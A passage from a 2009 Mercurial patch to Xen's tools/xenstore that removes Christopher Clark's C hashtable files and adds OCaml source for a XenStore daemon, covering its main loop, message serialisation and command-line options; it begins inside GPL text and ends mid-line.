the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
diff -r 10a8fae412c5 tools/xenstore/hashtable.c --- a/tools/xenstore/hashtable.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,285 +0,0 @@ -/* Copyright (C) 2004 Christopher Clark */ - -#include "hashtable.h" -#include "hashtable_private.h" -#include -#include -#include -#include -#include - -/* -Credit for primes table: Aaron Krowne - http://br.endernet.org/~akrowne/ - http://planetmath.org/encyclopedia/GoodHashTablePrimes.html -*/ -static const unsigned int primes[] = { -53, 97, 193, 389, -769, 1543, 3079, 6151, -12289, 24593, 49157, 98317, -196613, 393241, 786433, 1572869, -3145739, 6291469, 12582917, 25165843, -50331653, 100663319, 201326611, 402653189, -805306457, 1610612741 -}; -const unsigned int prime_table_length = sizeof(primes)/sizeof(primes[0]); -const unsigned int max_load_factor = 65; /* percentage */ - -/*****************************************************************************/ -struct hashtable * -create_hashtable(unsigned int minsize, - unsigned int (*hashf) (void*), - int (*eqf) (void*,void*)) -{ - struct hashtable *h; - unsigned int pindex, size = primes[0]; - - /* Check requested hashtable isn't too large */ - if (minsize > (1u << 30)) return NULL; - - /* Enforce size as prime */ - for (pindex=0; pindex < prime_table_length; pindex++) { - if (primes[pindex] > minsize) { size = primes[pindex]; break; } - } - - h = (struct hashtable *)calloc(1, sizeof(struct hashtable)); - if (NULL == h) - goto err0; - h->table = (struct entry **)calloc(size, sizeof(struct entry *)); - if (NULL == h->table) - goto err1; - - h->tablelength = size; - h->primeindex = pindex; - h->entrycount = 0; - h->hashfn = hashf; - h->eqfn = eqf; - h->loadlimit = (unsigned int)(((uint64_t)size * max_load_factor) / 100); - return h; - -err1: - free(h); -err0: - return NULL; -} - -/*****************************************************************************/ -unsigned int -hash(struct hashtable *h, void *k) -{ - /* Aim to protect against poor 
hash functions by adding logic here - * - logic taken from java 1.4 hashtable source */ - unsigned int i = h->hashfn(k); - i += ~(i << 9); - i ^= ((i >> 14) | (i << 18)); /* >>> */ - i += (i << 4); - i ^= ((i >> 10) | (i << 22)); /* >>> */ - return i; -} - -/*****************************************************************************/ -static int -hashtable_expand(struct hashtable *h) -{ - /* Double the size of the table to accomodate more entries */ - struct entry **newtable; - struct entry *e; - struct entry **pE; - unsigned int newsize, i, index; - /* Check we're not hitting max capacity */ - if (h->primeindex == (prime_table_length - 1)) return 0; - newsize = primes[++(h->primeindex)]; - - newtable = (struct entry **)calloc(newsize, sizeof(struct entry*)); - if (NULL != newtable) - { - /* This algorithm is not 'stable'. ie. it reverses the list - * when it transfers entries between the tables */ - for (i = 0; i < h->tablelength; i++) { - while (NULL != (e = h->table[i])) { - h->table[i] = e->next; - index = indexFor(newsize,e->h); - e->next = newtable[index]; - newtable[index] = e; - } - } - free(h->table); - h->table = newtable; - } - /* Plan B: realloc instead */ - else - { - newtable = (struct entry **) - realloc(h->table, newsize * sizeof(struct entry *)); - if (NULL == newtable) { (h->primeindex)--; return 0; } - h->table = newtable; - memset(newtable[h->tablelength], 0, newsize - h->tablelength); - for (i = 0; i < h->tablelength; i++) { - for (pE = &(newtable[i]), e = *pE; e != NULL; e = *pE) { - index = indexFor(newsize,e->h); - if (index == i) - { - pE = &(e->next); - } - else - { - *pE = e->next; - e->next = newtable[index]; - newtable[index] = e; - } - } - } - } - h->tablelength = newsize; - h->loadlimit = (unsigned int) - (((uint64_t)newsize * max_load_factor) / 100); - return -1; -} - -/*****************************************************************************/ -unsigned int -hashtable_count(struct hashtable *h) -{ - return h->entrycount; -} - 
-/*****************************************************************************/ -int -hashtable_insert(struct hashtable *h, void *k, void *v) -{ - /* This method allows duplicate keys - but they shouldn't be used */ - unsigned int index; - struct entry *e; - if (++(h->entrycount) > h->loadlimit) - { - /* Ignore the return value. If expand fails, we should - * still try cramming just this value into the existing table - * -- we may not have memory for a larger table, but one more - * element may be ok. Next time we insert, we'll try expanding again.*/ - hashtable_expand(h); - } - e = (struct entry *)calloc(1, sizeof(struct entry)); - if (NULL == e) { --(h->entrycount); return 0; } /*oom*/ - e->h = hash(h,k); - index = indexFor(h->tablelength,e->h); - e->k = k; - e->v = v; - e->next = h->table[index]; - h->table[index] = e; - return -1; -} - -/*****************************************************************************/ -void * /* returns value associated with key */ -hashtable_search(struct hashtable *h, void *k) -{ - struct entry *e; - unsigned int hashvalue, index; - hashvalue = hash(h,k); - index = indexFor(h->tablelength,hashvalue); - e = h->table[index]; - while (NULL != e) - { - /* Check hash value to short circuit heavier comparison */ - if ((hashvalue == e->h) && (h->eqfn(k, e->k))) return e->v; - e = e->next; - } - return NULL; -} - -/*****************************************************************************/ -void * /* returns value associated with key */ -hashtable_remove(struct hashtable *h, void *k) -{ - /* TODO: consider compacting the table when the load factor drops enough, - * or provide a 'compact' method. 
*/ - - struct entry *e; - struct entry **pE; - void *v; - unsigned int hashvalue, index; - - hashvalue = hash(h,k); - index = indexFor(h->tablelength,hash(h,k)); - pE = &(h->table[index]); - e = *pE; - while (NULL != e) - { - /* Check hash value to short circuit heavier comparison */ - if ((hashvalue == e->h) && (h->eqfn(k, e->k))) - { - *pE = e->next; - h->entrycount--; - v = e->v; - freekey(e->k); - free(e); - return v; - } - pE = &(e->next); - e = e->next; - } - return NULL; -} - -/*****************************************************************************/ -/* destroy */ -void -hashtable_destroy(struct hashtable *h, int free_values) -{ - unsigned int i; - struct entry *e, *f; - struct entry **table = h->table; - if (free_values) - { - for (i = 0; i < h->tablelength; i++) - { - e = table[i]; - while (NULL != e) - { f = e; e = e->next; freekey(f->k); free(f->v); free(f); } - } - } - else - { - for (i = 0; i < h->tablelength; i++) - { - e = table[i]; - while (NULL != e) - { f = e; e = e->next; freekey(f->k); free(f); } - } - } - free(h->table); - free(h); -} - -/* - * Copyright (c) 2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. 
- * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -*/ diff -r 10a8fae412c5 tools/xenstore/hashtable.h --- a/tools/xenstore/hashtable.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,199 +0,0 @@ -/* Copyright (C) 2002 Christopher Clark */ - -#ifndef __HASHTABLE_CWC22_H__ -#define __HASHTABLE_CWC22_H__ - -struct hashtable; - -/* Example of use: - * - * struct hashtable *h; - * struct some_key *k; - * struct some_value *v; - * - * static unsigned int hash_from_key_fn( void *k ); - * static int keys_equal_fn ( void *key1, void *key2 ); - * - * h = create_hashtable(16, hash_from_key_fn, keys_equal_fn); - * k = (struct some_key *) malloc(sizeof(struct some_key)); - * v = (struct some_value *) malloc(sizeof(struct some_value)); - * - * (initialise k and v to suitable values) - * - * if (! hashtable_insert(h,k,v) ) - * { exit(-1); } - * - * if (NULL == (found = hashtable_search(h,k) )) - * { printf("not found!"); } - * - * if (NULL == (found = hashtable_remove(h,k) )) - * { printf("Not found\n"); } - * - */ - -/* Macros may be used to define type-safe(r) hashtable access functions, with - * methods specialized to take known key and value types as parameters. 
- * - * Example: - * - * Insert this at the start of your file: - * - * DEFINE_HASHTABLE_INSERT(insert_some, struct some_key, struct some_value); - * DEFINE_HASHTABLE_SEARCH(search_some, struct some_key, struct some_value); - * DEFINE_HASHTABLE_REMOVE(remove_some, struct some_key, struct some_value); - * - * This defines the functions 'insert_some', 'search_some' and 'remove_some'. - * These operate just like hashtable_insert etc., with the same parameters, - * but their function signatures have 'struct some_key *' rather than - * 'void *', and hence can generate compile time errors if your program is - * supplying incorrect data as a key (and similarly for value). - * - * Note that the hash and key equality functions passed to create_hashtable - * still take 'void *' parameters instead of 'some key *'. This shouldn't be - * a difficult issue as they're only defined and passed once, and the other - * functions will ensure that only valid keys are supplied to them. - * - * The cost for this checking is increased code size and runtime overhead - * - if performance is important, it may be worth switching back to the - * unsafe methods once your program has been debugged with the safe methods. 
- * This just requires switching to some simple alternative defines - eg: - * #define insert_some hashtable_insert - * - */ - -/***************************************************************************** - * create_hashtable - - * @name create_hashtable - * @param minsize minimum initial size of hashtable - * @param hashfunction function for hashing keys - * @param key_eq_fn function for determining key equality - * @return newly created hashtable or NULL on failure - */ - -struct hashtable * -create_hashtable(unsigned int minsize, - unsigned int (*hashfunction) (void*), - int (*key_eq_fn) (void*,void*)); - -/***************************************************************************** - * hashtable_insert - - * @name hashtable_insert - * @param h the hashtable to insert into - * @param k the key - hashtable claims ownership and will free on removal - * @param v the value - does not claim ownership - * @return non-zero for successful insertion - * - * This function will cause the table to expand if the insertion would take - * the ratio of entries to table size over the maximum load factor. - * - * This function does not check for repeated insertions with a duplicate key. - * The value returned when using a duplicate key is undefined -- when - * the hashtable changes size, the order of retrieval of duplicate key - * entries is reversed. - * If in doubt, remove before insert. 
- */ - -int -hashtable_insert(struct hashtable *h, void *k, void *v); - -#define DEFINE_HASHTABLE_INSERT(fnname, keytype, valuetype) \ -int fnname (struct hashtable *h, keytype *k, valuetype *v) \ -{ \ - return hashtable_insert(h,k,v); \ -} - -/***************************************************************************** - * hashtable_search - - * @name hashtable_search - * @param h the hashtable to search - * @param k the key to search for - does not claim ownership - * @return the value associated with the key, or NULL if none found - */ - -void * -hashtable_search(struct hashtable *h, void *k); - -#define DEFINE_HASHTABLE_SEARCH(fnname, keytype, valuetype) \ -valuetype * fnname (struct hashtable *h, keytype *k) \ -{ \ - return (valuetype *) (hashtable_search(h,k)); \ -} - -/***************************************************************************** - * hashtable_remove - - * @name hashtable_remove - * @param h the hashtable to remove the item from - * @param k the key to search for - does not claim ownership - * @return the value associated with the key, or NULL if none found - */ - -void * /* returns value */ -hashtable_remove(struct hashtable *h, void *k); - -#define DEFINE_HASHTABLE_REMOVE(fnname, keytype, valuetype) \ -valuetype * fnname (struct hashtable *h, keytype *k) \ -{ \ - return (valuetype *) (hashtable_remove(h,k)); \ -} - - -/***************************************************************************** - * hashtable_count - - * @name hashtable_count - * @param h the hashtable - * @return the number of items stored in the hashtable - */ -unsigned int -hashtable_count(struct hashtable *h); - - -/***************************************************************************** - * hashtable_destroy - - * @name hashtable_destroy - * @param h the hashtable - * @param free_values whether to call 'free' on the remaining values - */ - -void -hashtable_destroy(struct hashtable *h, int free_values); - -#endif /* __HASHTABLE_CWC22_H__ */ - -/* - * Copyright (c) 
2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
-*/ diff -r 10a8fae412c5 tools/xenstore/hashtable_private.h --- a/tools/xenstore/hashtable_private.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,85 +0,0 @@ -/* Copyright (C) 2002, 2004 Christopher Clark */ - -#ifndef __HASHTABLE_PRIVATE_CWC22_H__ -#define __HASHTABLE_PRIVATE_CWC22_H__ - -#include "hashtable.h" - -/*****************************************************************************/ -struct entry -{ - void *k, *v; - unsigned int h; - struct entry *next; -}; - -struct hashtable { - unsigned int tablelength; - struct entry **table; - unsigned int entrycount; - unsigned int loadlimit; - unsigned int primeindex; - unsigned int (*hashfn) (void *k); - int (*eqfn) (void *k1, void *k2); -}; - -/*****************************************************************************/ -unsigned int -hash(struct hashtable *h, void *k); - -/*****************************************************************************/ -/* indexFor */ -static inline unsigned int -indexFor(unsigned int tablelength, unsigned int hashvalue) { - return (hashvalue % tablelength); -}; - -/* Only works if tablelength == 2^N */ -/*static inline unsigned int -indexFor(unsigned int tablelength, unsigned int hashvalue) -{ - return (hashvalue & (tablelength - 1u)); -} -*/ - -/*****************************************************************************/ -#define freekey(X) free(X) -/*define freekey(X) ; */ - - -/*****************************************************************************/ - -#endif /* __HASHTABLE_PRIVATE_CWC22_H__*/ - -/* - * Copyright (c) 2002, Christopher Clark - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. 
- * - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * * Neither the name of the original author; nor the names of any contributors - * may be used to endorse or promote products derived from this software - * without specific prior written permission. - * - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS - * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT - * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR - * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER - * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, - * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, - * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR - * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF - * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING - * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -*/ diff -r 10a8fae412c5 tools/xenstore/interface.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/interface.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,27 @@ +(* + Interface for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +class virtual interface = +object + method virtual can_read : bool + method virtual can_write : bool + method virtual destroy : unit + method virtual read : string -> int -> int -> int + method virtual write : string -> int -> int -> int +end diff -r 10a8fae412c5 tools/xenstore/main.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/main.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,85 @@ +(* + Main functions for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Handle event *) +let handle_event xenstored = + let port = Eventchan.pending () in + if port <> Constants.null_file_descr + then ( + if port = xenstored#virq_port + then ( + let domains = xenstored#domains#cleanup in + if List.length domains > 0 + then ( + List.iter (fun domain -> if domain#is_dying then xenstored#remove_domain domain) domains; + xenstored#watches#fire_watches "@releaseDomain" false false + ) + ); + if Eventchan.unmask port = - 1 then Utils.barf_perror "Failed to write to event channel" + ) + else Utils.barf_perror ("Failed to read from event channel") + +(* Handle I/O for domains *) +let handle_io xenstored = + let handle_io_for_domain domain = + try + if domain#can_read then domain#read; + if domain#has_input_message + then ( + Trace.io domain#id "IN" (Os.get_time ()) (List.hd domain#input_messages); + let msg_type = Message.message_type_to_string (List.hd domain#input_messages).Message.header.Message.message_type + and msg_length = (List.hd domain#input_messages).Message.header.Message.length in + if xenstored#options.Option.verbose then (Printf.printf "Got message %s len %d from %d\n" msg_type msg_length domain#id; flush stdout); + Process.process xenstored domain + ); + while domain#can_write do + let msg_type = Message.message_type_to_string (List.hd domain#output_messages).Message.header.Message.message_type + and msg_payload = (List.hd domain#output_messages).Message.payload in + if xenstored#options.Option.verbose then (Printf.printf "Writing msg %s (%s) out to %d\n" msg_type msg_payload domain#id; flush stdout); + Trace.io domain#id "OUT" (Os.get_time ()) (List.hd domain#output_messages); + domain#write + done + with Constants.Xs_error (Constants.EIO, _, _) -> ( + (try if not (Domain.is_unprivileged domain) then while 
domain#can_write do domain#write done with _ -> ()); + xenstored#remove_domain domain; + if Domain.is_unprivileged domain then xenstored#watches#fire_watches "@releaseDomain" false false + ) + in + List.iter handle_io_for_domain xenstored#domains#domains + +(* Main method *) +let main = + let options = Option.parse () in + Option.check_options options; + + let store = new Store.store in + let xenstored = new Xenstored.xenstored options store in + + Os.init (); + + let event_chan = xenstored#initialise_domains in + + while true do + Os.check_connections xenstored event_chan; + if Os.check_event_chan event_chan then handle_event xenstored; + handle_io xenstored + done + +(* Register callback for main function *) +let _ = Callback.register "main" main diff -r 10a8fae412c5 tools/xenstore/main_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/main_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,49 @@ +/* + C main function for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include +#include + +#include + +#include +#include +#include +#include + +int main(int argc, char *argv[], char *envp[]) +{ + value *val; + + /* Wait before things might hang up */ + sleep(1); + + caml_startup(argv); + val = caml_named_value("main"); + if (!val) { + printf("Couldn't find Caml main"); + return 1; + } + + caml_callback(*val, Val_int(0)); + + return 0; +} diff -r 10a8fae412c5 tools/xenstore/message.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/message.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,184 @@ +(* + Messages for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let header_size = 16; + +(* XenStore message types *) +type xs_message_type = + | XS_DEBUG + | XS_DIRECTORY + | XS_READ + | XS_GET_PERMS + | XS_WATCH + | XS_UNWATCH + | XS_TRANSACTION_START + | XS_TRANSACTION_END + | XS_INTRODUCE + | XS_RELEASE + | XS_GET_DOMAIN_PATH + | XS_WRITE + | XS_MKDIR + | XS_RM + | XS_SET_PERMS + | XS_WATCH_EVENT + | XS_ERROR + | XS_IS_DOMAIN_INTRODUCED + | XS_RESUME + | XS_SET_TARGET + | XS_UNKNOWN + +(* Convert a message type to an int32 *) +let xs_message_type_to_int32 message_type = + match message_type with + | XS_DEBUG -> 0l + | XS_DIRECTORY -> 1l + | XS_READ -> 2l + | XS_GET_PERMS -> 3l + | XS_WATCH -> 4l + | XS_UNWATCH -> 5l + | XS_TRANSACTION_START -> 6l + | XS_TRANSACTION_END -> 7l + | XS_INTRODUCE -> 8l + | XS_RELEASE -> 9l + | XS_GET_DOMAIN_PATH -> 10l + | XS_WRITE -> 11l + | XS_MKDIR -> 12l + | XS_RM -> 13l + | XS_SET_PERMS -> 14l + | XS_WATCH_EVENT -> 15l + | XS_ERROR -> 16l + | XS_IS_DOMAIN_INTRODUCED -> 17l + | XS_RESUME -> 18l + | XS_SET_TARGET -> 19l + | XS_UNKNOWN -> - 1l + +(* Convert an int32 to a message type *) +let int32_to_message_type xs_message_type = + match xs_message_type with + | 0l -> XS_DEBUG + | 1l -> XS_DIRECTORY + | 2l -> XS_READ + | 3l -> XS_GET_PERMS + | 4l -> XS_WATCH + | 5l -> XS_UNWATCH + | 6l -> XS_TRANSACTION_START + | 7l -> XS_TRANSACTION_END + | 8l -> XS_INTRODUCE + | 9l -> XS_RELEASE + | 10l -> XS_GET_DOMAIN_PATH + | 11l -> XS_WRITE + | 12l -> XS_MKDIR + | 13l -> XS_RM + | 14l -> XS_SET_PERMS + | 15l -> XS_WATCH_EVENT + | 16l -> XS_ERROR + | 17l -> XS_IS_DOMAIN_INTRODUCED + | 18l -> XS_RESUME + | 19l -> XS_SET_TARGET + | _ -> XS_UNKNOWN + +(* Return string representation of a message type *) +let message_type_to_string message_type = + match message_type with + | XS_DEBUG -> "DEBUG" + | 
XS_DIRECTORY -> "DIRECTORY" + | XS_READ -> "READ" + | XS_GET_PERMS -> "GET_PERMS" + | XS_WATCH -> "WATCH" + | XS_UNWATCH -> "UNWATCH" + | XS_TRANSACTION_START -> "TRANSACTION_START" + | XS_TRANSACTION_END -> "TRANSACTION_END" + | XS_INTRODUCE -> "INTRODUCE" + | XS_RELEASE -> "RELEASE" + | XS_GET_DOMAIN_PATH -> "GET_DOMAIN_PATH" + | XS_WRITE -> "WRITE" + | XS_MKDIR -> "MKDIR" + | XS_RM -> "RM" + | XS_SET_PERMS -> "SET_PERMS" + | XS_WATCH_EVENT -> "WATCH_EVENT" + | XS_ERROR -> "ERROR" + | XS_IS_DOMAIN_INTRODUCED -> "IS_DOMAIN_INTRODUCED" + | XS_RESUME -> "RESUME" + | XS_SET_TARGET -> "SET_TARGET" + | XS_UNKNOWN -> "UNKNOWN" + +(* Message header *) +type header = + { + message_type : xs_message_type; + transaction_id : int32; + request_id : int32; + length : int + } + +(* Message *) +type message = + { + header : header; + payload : string + } + +(* Make a message *) +let make message_type transaction_id request_id payload = + { + header = + { + message_type = message_type; + transaction_id = transaction_id; + request_id = request_id; + length = (String.length payload) + }; + payload = payload + } + +(* Null message *) +let null_message = make XS_UNKNOWN 0l 0l Constants.null_string + +(* ACK message *) +let ack message = + make message.header.message_type message.header.transaction_id message.header.request_id (Utils.null_terminate "OK") + +(* Error message *) +let error message error = + make XS_ERROR message.header.transaction_id message.header.request_id (Utils.null_terminate (Constants.error_message error)) + +(* Event message *) +let event payload = + make XS_WATCH_EVENT 0l 0l payload + +(* Reply message *) +let reply message payload = + make message.header.message_type message.header.transaction_id message.header.request_id payload + +(* Deserialise a message header from a string *) +let deserialise_header buffer = + { + message_type = int32_to_message_type (Utils.bytes_to_int32 (String.sub buffer 0 4)); + transaction_id = Utils.bytes_to_int32
(String.sub buffer 8 4); + request_id = Utils.bytes_to_int32 (String.sub buffer 4 4); + length = Utils.bytes_to_int (String.sub buffer 12 4) + } + +(* Serialise a message header to a string *) +let serialise_header header = + let message_type = Utils.int32_to_bytes (xs_message_type_to_int32 header.message_type) + and transaction_id = Utils.int32_to_bytes header.transaction_id + and request_id = Utils.int32_to_bytes header.request_id + and length = Utils.int_to_bytes header.length in + message_type ^ request_id ^ transaction_id ^ length diff -r 10a8fae412c5 tools/xenstore/option.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/option.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,95 @@ +(* + Options for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Options type *) +type t = { + fork : bool; + output_pid : bool; + domain_init : bool; + separate_domain : bool; + pid_file : string; + trace_file : string; + recovery : bool; + verbose : bool; + quota_num_entries_per_domain : int; + quota_max_entry_size : int; + quota_num_watches_per_domain : int; + quota_max_transaction : int +} + +(* Usage message header *) +let usage = "Usage:\n xenstored \n\nwhere options may include:\n" + +(* Parse command-line options *) +let parse () = + (* Default options *) + let fork = ref true + and output_pid = ref false + and domain_init = ref true + and pid_file = ref "" + and trace_file = ref "" + and recovery = ref true + and verbose = ref false + and separate_domain = ref false + and quota_num_entries_per_domain = ref 1000 + and quota_max_entry_size = ref 2048 + and quota_num_watches_per_domain = ref 128 + and quota_max_transaction = ref 10 in + + (* Command-line arguments list *) + let spec_list = Arg.align [ + ("--no-domain-init", Arg.Clear domain_init, " to state that xenstored should not initialise dom0,"); + ("--pid-file", Arg.Set_string pid_file, " giving a file for the daemon's pid to be written,"); + ("--no-fork", Arg.Clear fork, " to request that the daemon does not fork,"); + ("--output-pid", Arg.Set output_pid, " to request that the pid of the daemon is output,"); + ("--trace-file", Arg.String (fun s -> trace_file := s; Trace.traceout := Some (open_out s)), " giving the file for logging,"); + ("--entry-nb", Arg.Set_int quota_num_entries_per_domain, " limit the number of entries per domain,"); + ("--entry-size", Arg.Set_int quota_max_entry_size, " limit the size of entry per domain,"); + ("--entry-watch", Arg.Set_int quota_num_watches_per_domain," limit the number of watches per domain,"); + ("--transaction", 
Arg.Set_int quota_max_transaction, " limit the number of transactions allowed per domain,"); + ("--no-recovery", Arg.Clear recovery, " to request that no recovery should be attempted when the store is corrupted (debug only),"); + ("--preserve-local", Arg.Unit (fun () -> ()), " to request that /local is preserved on start-up,"); + ("--verbose", Arg.Set verbose, " to request verbose execution."); + ("--separate-dom", Arg.Set separate_domain, " xenstored runs in its own domain."); + ] in + + (* Parse command-line arguments *) + Arg.parse spec_list Os.parse_option usage; + + (* Set and return chosen options *) + { + fork = !fork; + output_pid = !output_pid; + domain_init = !domain_init; + separate_domain = !separate_domain; + pid_file = !pid_file; + trace_file = !trace_file; + recovery = !recovery; + verbose = !verbose; + quota_num_entries_per_domain = !quota_num_entries_per_domain; + quota_max_entry_size = !quota_max_entry_size; + quota_num_watches_per_domain = !quota_num_watches_per_domain; + quota_max_transaction = !quota_max_transaction + } + +let check_options options = + if not options.domain_init && 